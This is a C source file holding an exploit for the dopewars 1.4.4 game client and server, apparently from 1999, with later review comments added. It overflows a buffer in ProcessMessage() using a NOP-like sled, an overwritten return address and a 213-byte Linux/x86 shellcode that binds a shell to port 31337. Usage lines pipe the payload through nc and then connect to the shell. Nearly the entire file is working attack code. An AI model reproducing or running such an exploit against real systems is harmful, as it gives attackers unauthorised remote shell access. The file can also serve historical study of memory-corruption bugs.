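/*
 * dopewarez.c - Exploit for dopewars-1.4.4 client/server. Produces a shell.
 *
 * URL: http://bellatrix.pcl.ox.ac.uk/~ben/dopewars/
 *
 * C0de by nuuB [Sep 25, 1999]. Linux version.
 *
 * Usage (the original listing's angle-bracketed host placeholders were lost
 * in extraction; HOST below stands in for them):
 *
 * 0wn a server:
 *
 *   (dopewarez [offset] | nc HOST 7902) & ; sleep 5 ; nc HOST 31337
 *
 * 0wn a client using a bogus server:
 *
 *   (dopewarez 2285 | nc -l -p 7902) & ; wait4client ; nc HOST 31337
 *
 * Overflow occurs in ProcessMessage().
 *
 * NOTE(review): historical proof-of-concept for a 1999 Linux/x86 build.
 * The stack addresses below (0xbfff....) assume a fixed, executable,
 * non-randomised stack; they will not hold on a kernel with ASLR, NX or a
 * stack protector, and the offsets are specific to the 1.4.4 binaries.
 *
 * Egg layout written to stdout (EGGSIZE bytes):
 *   [0 .. EGGSIZE-3]          'A' (0x41 = inc %ecx on x86, a harmless sled)
 *   [EIP_OFFSET-2 .. +1]      "\xeb\x04" = jmp short +4, hops over the word
 *   [EIP_OFFSET   .. +3]      saved-EIP replacement (little-endian)
 *   [FIRST_OFFSET-2 .. +1]    "\xeb\x04" again
 *   [FIRST_OFFSET .. +3]      OWNED_FIRST (original note: 132 = Player->next)
 *   [EGGSIZE-2-C0DE_SIZE ..]  shellcode
 *   [EGGSIZE-2 .. EGGSIZE-1]  "^\n" - presumably the dopewars message
 *                             terminator (htol_LEstr refuses a '^' inside
 *                             a pointer for the same reason) - confirm.
 *
 * The shellcode contains the immediate 0x697a ("\x66\x68\x7a\x69"), which is
 * port 31337 in network byte order, matching the "nc HOST 31337" step above;
 * it appears to bind a shell on that port (int 0x80 sequence not audited here).
 */
/* The original listing's #include names were stripped in extraction; these are
 * the headers the code actually needs (stdio, stdlib, string, errno). The
 * fourth was presumably <netinet/in.h> for htonl(), no longer used. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EGGSIZE 598
#define EIP_OFFSET 208
#define FIRST_OFFSET 236
#define WRD_STACK_OFFSET 0x0bb0 /* approximate for server */
#define OWNED_FIRST (0xbffffffcUL - 132) /* 132 = offset for Player->next */

/* Linux/x86 bind-shell payload, 213 bytes. */
char c0de[] =
    "\xbc\xfc\xff\xff\xbf\xeb\x02\xeb\x0c\xe8\xf9\xff\xff\xff\x2f\x62"
    "\x69\x6e\x2f\x73\x68\x5d\x31\xc0\x89\xc3\x89\xc1\xb0\x46\xcd\x80"
    "\x31\xc9\x51\x41\x51\x41\x51\x89\xe1\x31\xdb\x43\x31\xc0\x04\x66"
    "\xcd\x80\x8d\x64\x24\x0c\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\x7a"
    "\x69\x04\x02\x66\x50\x89\xe3\x31\xc0\x04\x10\x50\x53\x57\x89\xe1"
    "\x31\xdb\xb3\x02\x31\xc0\x04\x66\xcd\x80\x85\xc0\x75\x6f\x8d\x64"
    "\x24\x1c\x31\xc0\x50\x57\x89\xe1\x31\xdb\xb3\x04\x31\xc0\x04\x66"
    "\xcd\x80\x8d\x64\x24\x08\x31\xc0\x04\x10\x50\x89\xe3\x8d\x64\x24"
    "\xf0\x89\xe1\x53\x51\x57\x89\xe1\x31\xdb\xb3\x05\x31\xc0\x04\x66"
    "\xcd\x80\x8d\x64\x24\x20\x89\xc7\x89\xfb\x31\xc9\xb0\x3f\xcd\x80"
    "\x89\xfb\x31\xc9\x41\xb0\x3f\xcd\x80\x89\xfb\x31\xc9\x80\xc1\x02"
    "\xb0\x3f\xcd\x80\x31\xc0\x88\x45\x07\x89\x6d\x08\x89\x45\x0c\x8d"
    "\x55\x0c\x8d\x4d\x08\x89\xeb\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x31"
    "\xc0\xb0\x01\xcd\x80";

/* Derived from the array so the size can never drift from the payload
 * (the original hard-coded 213, which is what this evaluates to). */
#define C0DE_SIZE (sizeof(c0de) - 1)

/* One extra byte so the trailing "^\n" copy can carry its NUL. */
char egg[EGGSIZE + 1];

/*
 * Print a diagnostic and exit(1).
 *
 * Goes to stderr: stdout is the payload stream piped into nc, and an error
 * text must not be mixed into it.
 */
void bail(char *s)
{
    fputs(s, stderr);
    fputc('\n', stderr);
    exit(1);
}

/*
 * Render a 32-bit value as its four little-endian bytes (x86 target order),
 * NUL-terminated, in a static buffer that the next call overwrites.
 *
 * Bails if any byte is 0x00 (would terminate the string-copied egg) or '^'
 * (appears to be a protocol delimiter, see header). Written with plain
 * shifts rather than htonl() so the result is little-endian on any host.
 */
char *htol_LEstr(unsigned long num)
{
    static char buf[5];
    int i;

    for (i = 0; i < 4; i++)
        buf[i] = (char)((num >> (8 * i)) & 0xff);
    buf[4] = '\0';

    if (strlen(buf) != 4)
        bail("NULL detected!");
    if (strchr(buf, '^'))
        bail("caret detected!");
    return buf;
}

/*
 * Build the egg and write it to stdout.
 *
 * argv[1] (optional): "0x..." sets the return address absolutely; any other
 * value is a signed decimal adjustment to the guessed address. Exits 1 on a
 * malformed argument, a forbidden byte in a pointer, or a short write.
 */
int main(int argc, char *argv[])
{
    unsigned long eip;

    /* Guess the target's stack from our own, then aim at the middle of the
     * sled between the FIRST_OFFSET word and the shellcode. Done in integer
     * arithmetic: pointer arithmetic below a local is undefined behaviour. */
    eip = (unsigned long)&eip - WRD_STACK_OFFSET;
    eip += FIRST_OFFSET + 4 + (EGGSIZE - 2 - FIRST_OFFSET - 4 - C0DE_SIZE) / 2;

    if (argc >= 2) {
        char *end = NULL;

        errno = 0;
        if (strncmp("0x", argv[1], 2) == 0) {
            eip = strtoul(argv[1], &end, 0);       /* absolute */
        } else {
            /* long -> unsigned long wraps modulo 2^N, so a negative
             * adjustment subtracts, exactly as the original atoi() did. */
            eip += (unsigned long)strtol(argv[1], &end, 10);
        }
        if (end == argv[1] || *end != '\0' || errno == ERANGE)
            bail("bad EIP argument");
    }
    fprintf(stderr, "Using EIP=0x%08lx\n", eip);

    memset(egg, 'A', EGGSIZE);
    /* jmp short +4 immediately before each pointer so that landing on the
     * sled just before it skips the (non-executable-as-code) word. */
    memcpy(egg + EIP_OFFSET - 2, "\xeb\x04", 2);
    memcpy(egg + EIP_OFFSET, htol_LEstr(eip), 4);
    memcpy(egg + FIRST_OFFSET - 2, "\xeb\x04", 2);
    memcpy(egg + FIRST_OFFSET, htol_LEstr(OWNED_FIRST), 4);
    memcpy(egg + EGGSIZE - 2 - C0DE_SIZE, c0de, C0DE_SIZE);
    memcpy(egg + EGGSIZE - 2, "^\n", 3);           /* includes the NUL */

    /* Write by length, not via "%s": the payload must reach nc intact even
     * if a byte happened to be zero. */
    if (fwrite(egg, 1, EGGSIZE, stdout) != EGGSIZE || fflush(stdout) != 0)
        bail("short write");
    return 0;
}
/* www.hack.co.za [2000]*/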